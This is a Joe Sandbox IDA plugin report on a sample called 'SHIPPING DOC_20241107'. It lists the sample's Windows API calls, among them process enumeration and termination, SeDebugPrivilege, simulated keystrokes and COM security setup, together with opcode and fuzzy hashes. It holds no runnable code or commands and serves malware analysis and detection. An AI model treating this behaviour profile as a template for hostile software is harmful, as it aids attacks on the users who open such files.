                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4090791747-0
                                                                                                                              • Opcode ID: 54ec3e647fecee88f56465b0bbbde252fab86c1e01b3a1597d03d00b3d9d395e
                                                                                                                              • Instruction ID: 09192231e2a482723b8f6dd584ad8dc0722d83b2fe4dcef70f9839e72d88b4dd
                                                                                                                              • Opcode Fuzzy Hash: 54ec3e647fecee88f56465b0bbbde252fab86c1e01b3a1597d03d00b3d9d395e
                                                                                                                              • Instruction Fuzzy Hash: ADE1AF316043119FCB14EF28D991B6ABBF1AF89350F14857DF89A9B2A2CB31DC41CB52
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A146AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A136DB,?), ref: 00A146CC
                                                                                                                                • Part of subcall function 00A146AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A136DB,?), ref: 00A146E5
                                                                                                                                • Part of subcall function 00A14AD8: GetFileAttributesW.KERNEL32(?,00A1374F), ref: 00A14AD9
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A14DE7
                                                                                                                              • _wcscmp.LIBCMT ref: 00A14E01
                                                                                                                              • MoveFileW.KERNEL32 ref: 00A14E1C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 793581249-0
                                                                                                                              • Opcode ID: d8a82eb37a0b190287f6afbd082d15c7c087aee4f3f6d29515e66ad840e2c89c
                                                                                                                              • Instruction ID: e65c9e509ff3d3540685fb8359f17a7765fcd0f9c6b4dcb4740e983cff618a10
                                                                                                                              • Opcode Fuzzy Hash: d8a82eb37a0b190287f6afbd082d15c7c087aee4f3f6d29515e66ad840e2c89c
                                                                                                                              • Instruction Fuzzy Hash: 275165B24083849BC724DBA4D981EDFB7ECAFC9350F10492EF585D3151EF34A6898766
                                                                                                                              APIs
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A38731
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 634782764-0
                                                                                                                              • Opcode ID: b134075215d88c94918afea9b8af5421f76618067383d27929159b8e733f0563
                                                                                                                              • Instruction ID: 96144073fe503452ca72e07b30f163ef6a828249d0b6c9a867a22ce3f7553fbd
                                                                                                                              • Opcode Fuzzy Hash: b134075215d88c94918afea9b8af5421f76618067383d27929159b8e733f0563
                                                                                                                              • Instruction Fuzzy Hash: 1351C370A00304BFEF249F69CD86FA97B65EB053A0F604516FA15E61E1CF79E980DB90
                                                                                                                              APIs
                                                                                                                              • LoadImageW.USER32 ref: 009EC477
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EC499
                                                                                                                              • LoadImageW.USER32 ref: 009EC4B1
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009EC4CF
                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009EC4F0
                                                                                                                              • DestroyIcon.USER32(00000000), ref: 009EC4FF
                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009EC51C
                                                                                                                              • DestroyIcon.USER32(?), ref: 009EC52B
                                                                                                                                • Part of subcall function 00A3A4E1: DeleteObject.GDI32(00000000), ref: 00A3A51A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2819616528-0
                                                                                                                              • Opcode ID: e61507856a7c03971ec0eeae843deb5126245b03dabf16b0e20cfff96e029cc3
                                                                                                                              • Instruction ID: 65a4a1433147b7ee4789d266fafb4f001bb5c9d7ab5702601abef49d139450eb
                                                                                                                              • Opcode Fuzzy Hash: e61507856a7c03971ec0eeae843deb5126245b03dabf16b0e20cfff96e029cc3
                                                                                                                              • Instruction Fuzzy Hash: 90518B70A10209EFDB24DF69CD45FAA3BB9EB59720F104528F946972E0DB70ED82DB50
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A0AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A0AC57
                                                                                                                                • Part of subcall function 00A0AC37: GetCurrentThreadId.KERNEL32(00000000,?,00A09945,?,00000001), ref: 00A0AC5E
                                                                                                                                • Part of subcall function 00A0AC37: AttachThreadInput.USER32(00000000,?,00A09945), ref: 00A0AC65
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A09950
                                                                                                                              • PostMessageW.USER32 ref: 00A0996D
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A09970
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A09979
                                                                                                                              • PostMessageW.USER32 ref: 00A09997
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A0999A
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A099A3
                                                                                                                              • PostMessageW.USER32 ref: 00A099BA
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A099BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2014098862-0
                                                                                                                              • Opcode ID: 8be5493d398fd35c63486d8f2a02b565d583d27b58a3105250a0ba14bd91969e
                                                                                                                              • Instruction ID: 399a6ef8595fbea787b330eff770f0376e7d9b6965bd409a9812e42b8993c051
                                                                                                                              • Opcode Fuzzy Hash: 8be5493d398fd35c63486d8f2a02b565d583d27b58a3105250a0ba14bd91969e
                                                                                                                              • Instruction Fuzzy Hash: 1611E571960618BFF610ABA0EC4AF6B7B2DDB4C751F110429F344AB0E0CAF25C11DAA4
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A08864,00000B00,?,?), ref: 00A08BEC
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A08864,00000B00,?,?), ref: 00A08BF3
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A08864,00000B00,?,?), ref: 00A08C08
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00A08864,00000B00,?,?), ref: 00A08C10
                                                                                                                              • DuplicateHandle.KERNEL32 ref: 00A08C13
                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A08864,00000B00,?,?), ref: 00A08C23
                                                                                                                              • GetCurrentProcess.KERNEL32(00A08864,00000000,?,00A08864,00000B00,?,?), ref: 00A08C2B
                                                                                                                              • DuplicateHandle.KERNEL32 ref: 00A08C2E
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00A08C54,00000000,00000000,00000000), ref: 00A08C48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1957940570-0
                                                                                                                              • Opcode ID: 4ca3962ddd99872f3c6d037243180eb61ccb067d66428b8c59786c84ee178087
                                                                                                                              • Instruction ID: f41c83492b5b682c42d836f6f4509eff105a86bf7de2435ee224528e6a6ddb35
                                                                                                                              • Opcode Fuzzy Hash: 4ca3962ddd99872f3c6d037243180eb61ccb067d66428b8c59786c84ee178087
                                                                                                                              • Instruction Fuzzy Hash: 3901A8B5650348FFE650EBA5EC49F6B3BACEB89711F004521FB05DB1A1CA7498059A20
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                              • API String ID: 2862541840-625585964
                                                                                                                              • Opcode ID: 5219e3470e191f13de152b78eb1ad715a601d777e4bff8462153be36bbad5114
                                                                                                                              • Instruction ID: a9613e0c59d2897c28c6f45e2e924bcf912f76d4865cba4a107b906df81de370
                                                                                                                              • Opcode Fuzzy Hash: 5219e3470e191f13de152b78eb1ad715a601d777e4bff8462153be36bbad5114
                                                                                                                              • Instruction Fuzzy Hash: 9C914F71A00225ABDF24DFA9D844FEFB7B8EF85B10F10856DF519AB280D7709945CBA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A07432: CLSIDFromProgID.OLE32 ref: 00A0744F
                                                                                                                                • Part of subcall function 00A07432: ProgIDFromCLSID.OLE32(?,00000000), ref: 00A0746A
                                                                                                                                • Part of subcall function 00A07432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A0736C,80070057,?,?), ref: 00A07478
                                                                                                                                • Part of subcall function 00A07432: CoTaskMemFree.OLE32(00000000), ref: 00A07488
                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00A2991B
                                                                                                                              • _memset.LIBCMT ref: 00A29928
                                                                                                                              • _memset.LIBCMT ref: 00A29A6B
                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A29A97
                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00A29AA2
                                                                                                                              Strings
                                                                                                                              • NULL Pointer assignment, xrefs: 00A29AF0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                                              • Opcode ID: 713e53c8b09bda4d792d70f4ecbcbee7c6652140dc767bc2f61c214118470ef8
                                                                                                                              • Instruction ID: f4d408b02a98f7a913d1b7b4bdf324947729753fcedbbcb95d8a329311f03899
                                                                                                                              • Opcode Fuzzy Hash: 713e53c8b09bda4d792d70f4ecbcbee7c6652140dc767bc2f61c214118470ef8
                                                                                                                              • Instruction Fuzzy Hash: FA913971D00228EBDB10DFA8EC81ADEBBB8EF48750F10416AF519A7291DB715A45CFA0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A36E56
                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A36E6A
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A36E84
                                                                                                                              • _wcscat.LIBCMT ref: 00A36EDF
                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A36EF6
                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A36F24
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                                              • String ID: SysListView32
                                                                                                                              • API String ID: 307300125-78025650
                                                                                                                              • Opcode ID: e4214222315eb918e40a621b7c11e1a8d200b22a95bc455526bea97cf67a71d8
                                                                                                                              • Instruction ID: f927f455d4cb4bb7a23241587c2a73fa3a049c5cca0dc19a0f8a43957f02989e
                                                                                                                              • Opcode Fuzzy Hash: e4214222315eb918e40a621b7c11e1a8d200b22a95bc455526bea97cf67a71d8
                                                                                                                              • Instruction Fuzzy Hash: 27418175A00348BFEB21DFA4DC85BEEB7B9EF08350F10886AF545A7191D7729D848B60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A13C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00A13CBE
                                                                                                                                • Part of subcall function 00A13C99: Process32FirstW.KERNEL32(00000000,?), ref: 00A13CCC
                                                                                                                                • Part of subcall function 00A13C99: CloseHandle.KERNEL32(00000000), ref: 00A13D96
                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A2EAB8
                                                                                                                              • GetLastError.KERNEL32 ref: 00A2EACB
                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A2EAFA
                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A2EB77
                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00A2EB82
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A2EBB7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                              • Opcode ID: 91622901b0a3c804e9c3fd091812a86aba7949912029bb7b6dabd68427f1b126
                                                                                                                              • Instruction ID: 81d01f2993f847bd0609d9f9e9e2959c72e0a664652bca5fd8138e4065d0e113
                                                                                                                              • Opcode Fuzzy Hash: 91622901b0a3c804e9c3fd091812a86aba7949912029bb7b6dabd68427f1b126
                                                                                                                              • Instruction Fuzzy Hash: 4E41CE316102119FDB14EF58DD95FADB7A6AF80714F08806CF9479F2D2CB74A944CB86
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoad
                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                              • Opcode ID: 978c7f26da1f0d0924cbfd0b91e2f1d1b9f5088a553ff9c2b0cef7f561f2ae50
                                                                                                                              • Instruction ID: c503f459a2190621c653ee194f6acc39e6eabf136241bd2587b04a1abac3c7d3
                                                                                                                              • Opcode Fuzzy Hash: 978c7f26da1f0d0924cbfd0b91e2f1d1b9f5088a553ff9c2b0cef7f561f2ae50
                                                                                                                              • Instruction Fuzzy Hash: 85112B37648347BADF209F54DC42DEE77ECDF0D360F10802AF50556281DAB55F8045A1
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A14353
                                                                                                                              • LoadStringW.USER32(00000000), ref: 00A1435A
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A14370
                                                                                                                              • LoadStringW.USER32(00000000), ref: 00A14377
                                                                                                                              • _wprintf.LIBCMT ref: 00A1439D
                                                                                                                              • MessageBoxW.USER32 ref: 00A143BB
                                                                                                                              Strings
                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00A14398
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                              • Opcode ID: 80009f6d67a9df1f17028b01b5aa17b57c060cd1cec11a03f23112dc228eeff4
                                                                                                                              • Instruction ID: 6791e3f3ab42f5744831f83f04c3b3ae7347a4340a49f1a7c96624c48197f834
                                                                                                                              • Opcode Fuzzy Hash: 80009f6d67a9df1f17028b01b5aa17b57c060cd1cec11a03f23112dc228eeff4
                                                                                                                              • Instruction Fuzzy Hash: C30162F2D14208BFE751DBE4DD89EE6776CD708301F0005A6B709E6051EB749E854B71
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A3D4E6
                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A3D506
                                                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 00A3D741
                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A3D75F
                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A3D780
                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00A3D79F
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A3D7C4
                                                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A3D7E7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1211466189-0
                                                                                                                              • Opcode ID: d1268117edd8436c6eb0c261e0763478022ce7a4fbefaeef76fa530692076ca6
                                                                                                                              • Instruction ID: 352e25987b96de582a0fb4ec75cad8cbd148b6749962cb5d41a65247a1f31990
                                                                                                                              • Opcode Fuzzy Hash: d1268117edd8436c6eb0c261e0763478022ce7a4fbefaeef76fa530692076ca6
                                                                                                                              • Instruction Fuzzy Hash: 3AB16875A00229EFDF14CF68D9897AE7BB1BF04711F088069FC58AE295D734A990CB90
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(FFFFFFFF,?), ref: 009B2ACF
                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009B2B17
                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006), ref: 009EC39A
                                                                                                                              • ShowWindow.USER32(FFFFFFFF,?), ref: 009EC406
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
